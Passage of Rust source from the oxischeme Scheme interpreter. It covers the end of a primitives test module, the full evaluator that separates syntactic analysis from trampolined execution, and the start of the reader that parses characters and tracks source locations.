should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_string_question() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_string_question.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_number_equal() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_number_equal.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_gt() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_gt.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_lt() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_lt.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/eval.rs
src/eval.rs
// Copyright 2015 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Oxischeme is an interpreter, but it is not a naiive AST walking //! interpreter. In contrast to an AST walking interpreter, syntactic analysis //! is separated from execution, so that no matter how many times an expression //! might be evaluated, it is only ever analyzed once. //! //! When evaluating a form, first we `analyze` it to derive its semantic //! `Meaning`. The meanings form an intermediate language containing everything //! we statically know about the expression, such as whether it is a conditional //! or a lambda form, or the location of a value bound to a variable name, so //! that we don't need to compute these things at execution time. After analysis //! has produced a meaning for the form, the meaning is then interpreted. This //! approach results in a speed up in the realm of 10 - 50 times faster than //! simple AST-walking evaluation. //! //! In SICP and LiSP, the implementation language is also Scheme, and the //! meanings are just elegant closures. Because we cannot rely on the host //! language's GC like they can, we require more fine-grained control of the data //! and its lifetime. Therefore, we explicitly model all data that can be //! statically gathered in the `MeaningData` type. Evaluation of each special //! form is implemented by two things: first, a variant in `MeaningData`, and //! 
secondly a `MeaningEvaluatorFn` function that takes the heap, an activation, //! and the meaning data for that form. The simplest example is quoted forms: we //! determine the quoted value during analysis and at runtime simply return it. //! //! enum MeaningData { //! ... //! Quotation(RootedValue), //! ... //! } //! //! fn evaluate_quotation(heap: &mut Heap, //! data: &MeaningData, //! act: &mut RootedActivationPtr) -> TrampolineResult { //! if let MeaningData::Quotation(ref val) = *data { //! return Ok(Trampoline::Value(Rooted::new(heap, **val))); //! } //! //! panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); //! } //! //! //! ## References //! //! * ["Separating Syntactic Analysis from Execution"](https://mitpress.mit.edu/sicp/full-text/sicp/book/node83.html), //! chapter 4.1.7 of *Structure and Interpretation of Computer Programs* by //! Abelson et all //! //! * "Fast Interpretation", chapter 6 in *Lisp In Small Pieces* by Christian //! Queinnec extern crate test; use std::cmp::{Ordering}; use std::fmt; use std::hash; use environment::{Activation, RootedActivationPtr}; use heap::{Heap, Rooted}; use read::{Location}; use value::{RootedValue, SchemeResult, Value}; /// Evaluate the given form in the global environment. pub fn evaluate(heap: &mut Heap, form: &RootedValue, location: Location) -> SchemeResult { let meaning = try!(analyze(heap, form, location)); let mut act = heap.global_activation(); meaning.evaluate(heap, &mut act) } /// Evaluate the file at the given path and return the value of the last form. 
pub fn evaluate_file(heap: &mut Heap, file_path: &str) -> SchemeResult { use read::read_from_file; let reader = match read_from_file(file_path, heap) { Ok(r) => r, Err(e) => { return Err(format!("Error: evaluate_file could not read {}: {}", file_path, e)); }, }; let mut result = Rooted::new(heap, Value::EmptyList); for (location, read_result) in reader { let form = try!(read_result); result.emplace(*try!(evaluate(heap, &form, location))); } return Ok(result); } /// To optimize tail calls and eliminate the stack frames that would otherwise /// be used by them, we trampoline thunks in a loop and encode that process in /// this type. #[derive(Debug)] pub enum Trampoline { Value(RootedValue), Thunk(RootedActivationPtr, Meaning), } impl Trampoline { /// Keep evaluating thunks until it yields a value. pub fn run(self, heap: &mut Heap) -> SchemeResult { match self { Trampoline::Value(v) => { return Ok(v); }, Trampoline::Thunk(act, meaning) => { let mut a = act; let mut m = meaning; loop { match try!(m.evaluate_to_thunk(heap, &mut a)) { Trampoline::Value(v) => { return Ok(v); }, Trampoline::Thunk(aa, mm) => { a = aa; m = mm; }, } } } } } } /// Either a `Trampoline`, or a `String` describing the error. pub type TrampolineResult = Result<Trampoline, String>; /// The set of data generated by our syntactic analysis pretreatment. #[derive(Clone, Hash, Debug)] enum MeaningData { /// The quoted value. Quotation(RootedValue), /// A reference to (i'th activation, j'th binding, original name). Reference(u32, u32, String), /// Push a new binding to the current activation with the value of the given /// meaning. Definition(u32, u32, Meaning), /// Set the (i'th activation, j'th binding) to the value of the given /// meaning. SetVariable(u32, u32, Meaning), /// Condition, consequent, and alternative. Conditional(Meaning, Meaning, Meaning), /// Evaluate the first meaning (presumable for side-effects, before /// evaluating and returning the second meaning. 
Sequence(Meaning, Meaning), /// Arity and body. Lambda(u32, Meaning), /// Procedure and parameters. Invocation(Meaning, Vec<Meaning>), } impl fmt::Display for MeaningData { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { MeaningData::Quotation(ref val) => { write!(f, "(quotation {})", **val) }, MeaningData::Reference(i, j, ref name) => { write!(f, "(reference {} {} {})", i, j, name) }, MeaningData::Definition(i, j, ref val) => { write!(f, "(definition {} {} {})", i, j, val) }, MeaningData::SetVariable(i, j, ref val) => { write!(f, "(set-variable {} {} {})", i, j, val) }, MeaningData::Conditional(ref condition, ref consequent, ref alternative) => { write!(f, "(conditional {} {} {})", condition, consequent, alternative) }, MeaningData::Sequence(ref first, ref second) => { write!(f, "(sequence {} {})", first, second) }, MeaningData::Lambda(arity, ref body) => { write!(f, "(lambda {} {})", arity, body) }, MeaningData::Invocation(ref procedure, ref arguments) => { try!(write!(f, "(invocation {} [", procedure)); let mut is_first = true; for arg in arguments.iter() { try!(write!(f, "{}{}", if is_first { "" } else { " " }, arg)); is_first = false; } write!(f, "])") }, } } } /// Type signature for the evaulator functions which evaluate only a specific /// syntactic form. 
type MeaningEvaluatorFn = fn(&mut Heap, &MeaningData, &mut RootedActivationPtr) -> TrampolineResult; impl fmt::Debug for MeaningEvaluatorFn { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "0x{:x}", *self as usize) } } #[allow(unused_variables)] fn evaluate_quotation(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Quotation(ref val) = *data { return Ok(Trampoline::Value(Rooted::new(heap, **val))); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_reference(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Reference(i, j, ref name) = *data { let val = try!(act.fetch(heap, i, j).ok().ok_or( format!("Reference to variable that hasn't been defined: {}", name))); return Ok(Trampoline::Value(val)); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_definition(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Definition(i, j, ref definition_value_meaning) = *data { debug_assert!(i == 0, "Definitions should always be in the youngest activation"); let val = try!(definition_value_meaning.evaluate(heap, act)); act.define(j, *val); return Ok(Trampoline::Value(heap.unspecified_symbol())); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_set_variable(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::SetVariable(i, j, ref definition_value_meaning) = *data { let val = try!(definition_value_meaning.evaluate(heap, act)); try!(act.update(i, j, &val).ok().ok_or( "Cannot set variable before it has been defined".to_string())); return Ok(Trampoline::Value(heap.unspecified_symbol())); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_conditional(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> 
TrampolineResult { if let MeaningData::Conditional(ref condition, ref consequent, ref alternative) = *data { let val = try!(condition.evaluate(heap, act)); return Ok(Trampoline::Thunk(Rooted::new(heap, **act), if *val == Value::new_boolean(false) { (*alternative).clone() } else { (*consequent).clone() })); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_sequence(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Sequence(ref first, ref second) = *data { try!(first.evaluate(heap, act)); return Ok(Trampoline::Thunk(Rooted::new(heap, **act), second.clone())); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_lambda(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Lambda(arity, ref body) = *data { return Ok(Trampoline::Value( Value::new_procedure(heap, arity, act, (*body).clone()))); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } pub fn apply_invocation(heap: &mut Heap, proc_val: &RootedValue, args: Vec<RootedValue>) -> TrampolineResult { match **proc_val { Value::Primitive(primitive) => { return primitive.call(heap, args); }, Value::Procedure(proc_ptr) => { match proc_ptr.arity.cmp(&(args.len() as u32)) { Ordering::Less => { return Err("Error: too many arguments passed".to_string()); }, Ordering::Greater => { return Err("Error: too few arguments passed".to_string()); }, _ => { let proc_act = proc_ptr.act.as_ref() .expect("Should never see an uninitialized procedure!"); let rooted_proc_act = Rooted::new(heap, *proc_act); let body = proc_ptr.body.as_ref() .expect("Should never see an uninitialized procedure!"); let new_act = Activation::extend(heap, &rooted_proc_act, args); return Ok(Trampoline::Thunk(new_act, (**body).clone())); }, } }, _ => { return Err(format!("Error: expected a procedure to call, found {}", **proc_val)); } } } fn evaluate_invocation(heap: &mut Heap, data: 
&MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Invocation(ref procedure, ref params) = *data { let proc_val = try!(procedure.evaluate(heap, act)); let args = try!(params.iter().map(|p| p.evaluate(heap, act)).collect()); return apply_invocation(heap, &proc_val, args); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } /// The `Meaning` type is our intermediate language produced by syntactic /// analysis. It is a triple containing a `MeaningData` variant, its /// corresponding `MeaningEvaluatorFn`, and the source location this `Meaning` /// originates from. #[derive(Debug)] pub struct Meaning { data: Box<MeaningData>, evaluator: MeaningEvaluatorFn, location: Location, } /// ## `Meaning` Constructors impl Meaning { fn new_quotation(form: &RootedValue, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Quotation((*form).clone())), evaluator: evaluate_quotation, location: location } } fn new_reference(i: u32, j: u32, name: String, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Reference(i, j, name)), evaluator: evaluate_reference, location: location } } fn new_set_variable(i: u32, j: u32, val: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::SetVariable(i, j, val)), evaluator: evaluate_set_variable, location: location, } } fn new_conditional(condition: Meaning, consquent: Meaning, alternative: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Conditional(condition, consquent, alternative)), evaluator: evaluate_conditional, location: location, } } fn new_sequence(first: Meaning, second: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Sequence(first, second)), evaluator: evaluate_sequence, location: location, } } fn new_definition(i: u32, j: u32, defined: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Definition(i, j, defined)), evaluator: 
evaluate_definition, location: location, } } fn new_lambda(arity: u32, body: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Lambda(arity, body)), evaluator: evaluate_lambda, location: location, } } fn new_invocation(procedure: Meaning, params: Vec<Meaning>, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Invocation(procedure, params)), evaluator: evaluate_invocation, location: location } } } /// ## `Meaning` Methods impl Meaning { /// Evaluate this form no further than until the next thunk. #[inline] fn evaluate_to_thunk(&self, heap: &mut Heap, act: &mut RootedActivationPtr) -> TrampolineResult { match (self.evaluator)(heap, &*self.data, act) { // Add this location to the error message. These stack up and give a // backtrace. Err(e) => Err(format!("{}:\n{}", self.location, e)), ok => ok } } /// Evaluate this form completely, trampolining all thunks until a value is /// produced. fn evaluate(&self, heap: &mut Heap, act: &mut RootedActivationPtr) -> SchemeResult { let thunk = try!(self.evaluate_to_thunk(heap, act)); thunk.run(heap) } } impl Clone for Meaning { fn clone(&self) -> Self { Meaning { data: self.data.clone(), evaluator: self.evaluator, location: self.location.clone(), } } } impl fmt::Display for Meaning { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", *self.data) } } impl hash::Hash for Meaning { fn hash<H: hash::Hasher>(&self, state: &mut H) { let u = self.evaluator as usize; u.hash(state); self.data.hash(state); } } /// Either a `Meaning`, or a `String` explaining the error. pub type MeaningResult = Result<Meaning, String>; /// The main entry point for syntactic analysis. 
pub fn analyze(heap: &mut Heap, form: &RootedValue, location: Location) -> MeaningResult { if form.is_atom() { return analyze_atom(heap, form, location); } let pair = form.to_pair(heap).expect( "If a value is not an atom, then it must be a pair."); let quote = heap.quote_symbol(); let if_symbol = heap.if_symbol(); let begin = heap.begin_symbol(); let define = heap.define_symbol(); let set_bang = heap.set_bang_symbol(); let lambda = heap.lambda_symbol(); match *pair.car(heap) { v if v == *quote => analyze_quoted(heap, form), v if v == *define => analyze_definition(heap, form), v if v == *set_bang => analyze_set(heap, form), v if v == *lambda => analyze_lambda(heap, form), v if v == *if_symbol => analyze_conditional(heap, form), v if v == *begin => analyze_sequence(heap, form), _ => analyze_invocation(heap, form), } } /// Return true if the form doesn't need to be evaluated because it is /// "autoquoting" or "self evaluating", false otherwise. fn is_auto_quoting(form: &RootedValue) -> bool { match **form { Value::EmptyList => false, Value::Pair(_) => false, Value::Symbol(_) => false, _ => true, } } fn analyze_atom(heap: &mut Heap, form: &RootedValue, location: Location) -> MeaningResult { if is_auto_quoting(form) { return Ok(Meaning::new_quotation(form, location)); } if let Some(sym) = form.to_symbol(heap) { if let Some((i, j)) = heap.environment.lookup(&**sym) { return Ok(Meaning::new_reference(i, j, (**sym).clone(), location)); } // This is a reference to a global variable that hasn't been defined // yet. 
let (i, j) = heap.environment.define_global((**sym).clone()); return Ok(Meaning::new_reference(i, j, (**sym).clone(), location)); } return Err(format!("Static error: Cannot evaluate: {}", **form)); } fn analyze_quoted(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(2) = form.len() { let pair = form.to_pair(heap).unwrap(); return Ok(Meaning::new_quotation( &form.cdr(heap).unwrap().car(heap).unwrap(), heap.locate(&pair))); } let msg = "Static error: Wrong number of parts in quoted form"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}", heap.locate(&pair), msg) } else { msg.to_string() }) } fn analyze_definition(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(3) = form.len() { let pair = form.to_pair(heap).expect( "If len = 3, then form must be a pair"); let sym = try!(pair.cadr(heap)); let location = heap.locate(&pair); if let Some(str) = sym.to_symbol(heap) { let def_value_form = try!(pair.caddr(heap)); let def_value_meaning = try!(analyze(heap, &def_value_form, location.clone())); let (i, j) = heap.environment.define((**str).clone()); return Ok(Meaning::new_definition(i, j, def_value_meaning, location)); } return Err(format!("{}: Static error: can only define symbols, found: {}", location, *sym)); } let msg = "Static error: improperly formed definition"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } fn analyze_set(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(3) = form.len() { let pair = form.to_pair(heap).expect( "If len = 3, then form must be a pair"); let sym = try!(pair.cadr(heap)); let location = heap.locate(&pair); if let Some(str) = sym.to_symbol(heap) { let set_value_form = try!(pair.caddr(heap)); let set_value_meaning = try!(analyze(heap, &set_value_form, location.clone())); if let Some((i, j)) = heap.environment.lookup(&**str) { return Ok(Meaning::new_set_variable(i, j, set_value_meaning, 
location)); } // This is setting a global variable that isn't defined yet, but // could be defined later. The check will happen at evaluation time. let (i, j) = heap.environment.define_global((**str).clone()); return Ok(Meaning::new_set_variable(i, j, set_value_meaning, location)); } return Err(format!("{}: Static error: can only set! symbols, found: {}", location, *sym)); } let msg = "Static error: improperly formed set!"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } fn analyze_lambda(heap: &mut Heap, form: &RootedValue) -> MeaningResult { let length = try!(form.len().ok().ok_or_else(|| { let msg = "Static error: improperly formed lambda"; if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) } })); if length < 3 { let msg = "Static error: improperly formed lambda"; return Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } let pair = form.to_pair(heap).unwrap(); let location = heap.locate(&pair); let body = pair.cddr(heap) .ok().expect("Must be here since length >= 3"); let mut params = vec!(); let mut arity = 0; let params_form = pair.cadr(heap).ok().expect( "Must be here since length >= 3"); for p in params_form.iter() { arity += 1; params.push(try!(p.ok().ok_or(format!("{}: Bad lambda parameters: {}", location, *params_form)))); } let mut param_names : Vec<String> = try!(params.into_iter().map(|p| { let sym = try!(p.to_symbol(heap) .ok_or(format!("{}: Can only define symbol parameters, found {}", location, p))); Ok((**sym).clone()) }).collect()); // Find any definitions in the body, so we can add them to the extended // environment. 
let define = heap.define_symbol(); let mut local_definitions : Vec<String> = body.iter() .filter_map(|form_result| { if let Ok(form) = form_result { if let Some(pair) = form.to_pair(heap) { if pair.car(heap) == define { if let Ok(name) = pair.cadr(heap) { return name.to_symbol(heap).map(|s| (**s).clone()) } } } } None }) .collect(); let mut new_bindings = Vec::with_capacity(param_names.len() + local_definitions.len()); new_bindings.append(&mut param_names); new_bindings.append(&mut local_definitions); let body_meaning = try!(heap.with_extended_env(new_bindings, &|heap| { make_meaning_sequence(heap, &body) })); return Ok(Meaning::new_lambda(arity as u32, body_meaning, location)); } fn analyze_conditional(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(4) = form.len() { let pair = form.to_pair(heap).expect( "If len = 4, then form must be a pair"); let location = heap.locate(&pair); let condition_form = try!(pair.cadr(heap)); let condition_meaning = try!(analyze(heap, &condition_form, location.clone())); let consequent_form = try!(pair.caddr(heap)); let consequent_meaning = try!(analyze(heap, &consequent_form, location.clone())); let alternative_form = try!(pair.cadddr(heap)); let alternative_meaning = try!(analyze(heap, &alternative_form, location.clone())); return Ok(Meaning::new_conditional(condition_meaning, consequent_meaning, alternative_meaning, location)); } let msg = "Static error: improperly if expression"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } fn make_meaning_sequence(heap: &mut Heap, forms: &RootedValue) -> MeaningResult { if let Some(ref cons) = forms.to_pair(heap) { let first_form = cons.car(heap); let location = heap.locate(cons); let first = try!(analyze(heap, &first_form, location.clone())); if *cons.cdr(heap) == Value::EmptyList { return Ok(first); } else { let rest_forms = cons.cdr(heap); let rest = 
try!(make_meaning_sequence(heap, &rest_forms)); return Ok(Meaning::new_sequence(first, rest, location)); } } Err(format!("Static error: improperly formed sequence: {}", **forms)) } fn analyze_sequence(heap: &mut Heap, form: &RootedValue) -> MeaningResult { let forms = try!(form.cdr(heap).ok_or( format!("Static error: improperly formed sequence: {}", **form))); make_meaning_sequence(heap, &forms) } fn make_meaning_vector(heap: &mut Heap, forms: &RootedValue, mut meanings: Vec<Meaning>) -> Result<Vec<Meaning>, String> { match **forms { Value::EmptyList => Ok(meanings), Value::Pair(ref cons) => { let car = cons.car(heap); let rest = cons.cdr(heap); let pair = forms.to_pair(heap).unwrap(); let location = heap.locate(&pair); meanings.push(try!(analyze(heap, &car, location))); make_meaning_vector(heap, &rest, meanings) }, _ => { panic!("Passed improper list to `make_meaning_vector`!"); } } } fn analyze_invocation(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Some(ref cons) = form.to_pair(heap) { let location = heap.locate(cons); let proc_form = cons.car(heap); let proc_meaning = try!(analyze(heap, &proc_form, location.clone())); let params_form = cons.cdr(heap); let arity = try!(params_form.len().ok().ok_or( "Static error: improperly formed invocation".to_string())); let params_meaning = try!(make_meaning_vector( heap, &params_form, Vec::with_capacity(arity as usize))); return Ok(Meaning::new_invocation(proc_meaning, params_meaning, location)); } return Err(format!("Static error: improperly formed invocation: {}", **form)); } // TESTS ----------------------------------------------------------------------- #[cfg(test)] mod tests { use super::*; use heap::{Heap, Rooted}; use read::{Location}; use value::{list, Value}; #[test] fn test_eval_integer() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_integer.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(42)); } #[test] fn 
test_eval_boolean() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_boolean.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_boolean(true)); } #[test] fn test_eval_quoted() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_quoted.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::EmptyList); } #[test] fn test_eval_if_consequent() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_if_consequent.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(1)); } #[test] fn test_eval_if_alternative() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_if_alternative.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(2)); } #[test] fn test_eval_begin() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_begin.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(2)); } #[test] fn test_eval_variables() { let heap = &mut Heap::new(); let define_symbol = heap.define_symbol(); let set_bang_symbol = heap.set_bang_symbol(); let foo_symbol = heap.get_or_create_symbol("foo".to_string()); let mut def_items = [
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
true
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/read.rs
src/read.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Parsing values. use std::cell::{RefCell}; use std::fmt; use std::iter::{Peekable}; use std::old_io::{BufferedReader, File, IoError, IoErrorKind, IoResult, MemReader}; use heap::{Heap, Rooted}; use value::{list, RootedValue, SchemeResult, Value}; /// `CharReader` reads characters one at a time from the given input `Reader`. struct CharReader<R> { reader: BufferedReader<R>, } impl<R: Reader> CharReader<R> { /// Create a new `CharReader` instance. pub fn new(reader: R) -> CharReader<R> { CharReader { reader: BufferedReader::new(reader) } } } impl<R: Reader> Iterator for CharReader<R> { type Item = char; /// Returns `Some(c)` for each character `c` from the input reader. Upon /// reaching EOF, returns `None`. fn next(&mut self) -> Option<char> { match self.reader.read_char() { Ok(c) => Some(c), Err(ref e) if is_eof(e) => None, Err(e) => panic!("IO ERROR! {}", e), } } } /// Return true if the error is reaching the end of file, false otherwise. fn is_eof(err : &IoError) -> bool { err.kind == IoErrorKind::EndOfFile } /// Return true if the character is the start of a comment, false otherwise. fn is_comment(c: &char) -> bool { *c == ';' } /// Return true if the character is a delimiter between tokens, false otherwise. 
fn is_delimiter(c: &char) -> bool { c.is_whitespace() || is_comment(c) || *c == ')' || *c == '(' } /// Return true if we have EOF (`None`) or a delimiting character, false /// otherwise. fn is_eof_or_delimiter(oc: &Option<char>) -> bool { match *oc { None => true, Some(ref c) if is_delimiter(c) => true, _ => false, } } fn is_symbol_initial(c: &char) -> bool { c.is_alphabetic() || is_symbol_special_initial(c) || is_symbol_peculiar(c) } fn is_symbol_peculiar(c: &char) -> bool { *c == '+' || *c == '-' || *c == '…' } fn is_symbol_special_initial(c: &char) -> bool { *c == '!' || *c == '$' || *c == '%' || *c == '&' || *c == '*' || *c == '/' || *c == ':' || *c == '<' || *c == '=' || *c == '>' || *c == '?' || *c == '~' || *c == '_' || *c == '^' } fn is_symbol_subsequent(c: &char) -> bool { is_symbol_initial(c) || c.is_digit(10) || *c == '.' || *c == '+' || *c == '-' } /// A source location. #[derive(Debug)] pub struct Location { /// The source file. pub file: String, /// 1-based line number. pub line: u64, /// 1-based column number. pub column: u64 } impl Location { /// Create a new `Location` object. pub fn new(file: String) -> Location { Location { file: file, line: 1, column: 1, } } /// Create a placeholder `Location` object for when the actual location is /// unknown. pub fn unknown() -> Location { let mut loc = Location::new("<unknown source location>".to_string()); loc.line = 0; loc.column = 0; loc } } impl fmt::Display for Location { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}:{}:{}", self.file, self.line, self.column) } } impl Clone for Location { fn clone(&self) -> Self { let mut new_loc = Location::new(self.file.clone()); new_loc.line = self.line; new_loc.column = self.column; new_loc } } /// A pair of `SchemeResult` and `Location`. pub type SchemeResultAndLocation = (Location, SchemeResult); /// `Read` iteratively parses values from the input `Reader`. 
pub struct Read<R: Reader> { chars: RefCell<Peekable<CharReader<R>>>, current_location: Location, result: Result<(), String>, heap_ptr: *mut Heap, had_error: bool } impl<'a, R: Reader> Read<R> { /// Create a new `Read` instance from the given `Reader` input source. pub fn new(reader: R, heap: *mut Heap, file_name: String) -> Read<R> { Read { chars: RefCell::new(CharReader::new(reader).peekable()), current_location: Location::new(file_name), result: Ok(()), heap_ptr: heap, had_error: false, } } /// Get the current context. fn heap(&'a self) -> &'a mut Heap { unsafe { self.heap_ptr.as_mut() .expect("Read<R> should always have a valid Heap") } } /// Peek at the next character in our input stream. fn peek_char(&self) -> Option<char> { match self.chars.borrow_mut().peek() { None => None, Some(c) => Some(*c) } } /// Take the next character from the input stream. fn next_char(&mut self) -> Option<char> { let opt_c = self.chars.borrow_mut().next(); if let Some(ref c) = opt_c.as_ref() { match **c { '\n' => { self.current_location.line += 1; self.current_location.column = 1; }, _ => self.current_location.column += 1, }; } opt_c } /// Skip to after the next newline character. fn skip_line(&mut self) { loop { match self.peek_char() { None => return, Some('\n') => return, _ => { }, } self.next_char(); } } /// Trim initial whitespace and skip comments. fn trim(&mut self) { loop { let skip_line = match self.peek_char() { Some(c) if c.is_whitespace() => false, Some(c) if is_comment(&c) => true, _ => return, }; if skip_line { self.skip_line(); } else { self.next_char(); } } } /// Get the results of parsing thus far. If there was an error parsing, a /// diagnostic message will be the value of the error. pub fn get_result(&'a self) -> &'a Result<(), String> { &self.result } /// Report a failure reading values. 
fn report_failure(&mut self, msg: String) -> Option<SchemeResultAndLocation> { self.had_error = true; Some((self.current_location.clone(), Err(format!("{}: {}", self.current_location, msg)))) } /// Report an unexpected character. fn unexpected_character(&mut self, c: &char) -> Option<SchemeResultAndLocation> { self.report_failure(format!("Unexpected character: {}", c)) } /// Expect that the next character is `c` and report a failure if it is /// not. If this ever returns `Some`, then it will always be /// `Some((Location, Err))`. fn expect_character(&mut self, c: char) -> Option<SchemeResultAndLocation> { match self.next_char() { None => { self.report_failure(format!("Expected '{}', but found EOF.", c)) }, Some(d) if d != c => { self.report_failure(format!("Expected '{}', found: '{}'", c, d)) }, _ => None } } /// Report an unexpected EOF. fn unexpected_eof(&mut self) -> Option<SchemeResultAndLocation> { self.report_failure("Unexpected EOF".to_string()) } /// Report a bad character literal, e.g. `#\bad`. fn bad_character_literal(&mut self) -> Option<SchemeResultAndLocation> { self.report_failure("Bad character value".to_string()) } /// Report an unterminated string literal. fn unterminated_string(&mut self) -> Option<SchemeResultAndLocation> { self.report_failure("Unterminated string literal".to_string()) } /// Register the given value as having originated form the given location, /// and wrap it up for returning from the iterator. fn enlocate(&self, location: Location, val: RootedValue) -> Option<SchemeResultAndLocation> { if let Some(pair) = val.to_pair(self.heap()) { self.heap().enlocate(location.clone(), pair); } Some((location, Ok(val))) } /// Given a value, root it and wrap it for returning from the iterator. fn root(&self, loc: Location, val: Value) -> Option<SchemeResultAndLocation> { self.enlocate(loc, Rooted::new(self.heap(), val)) } /// Read a character value, after the starting '#' and '\' characters have /// already been eaten. 
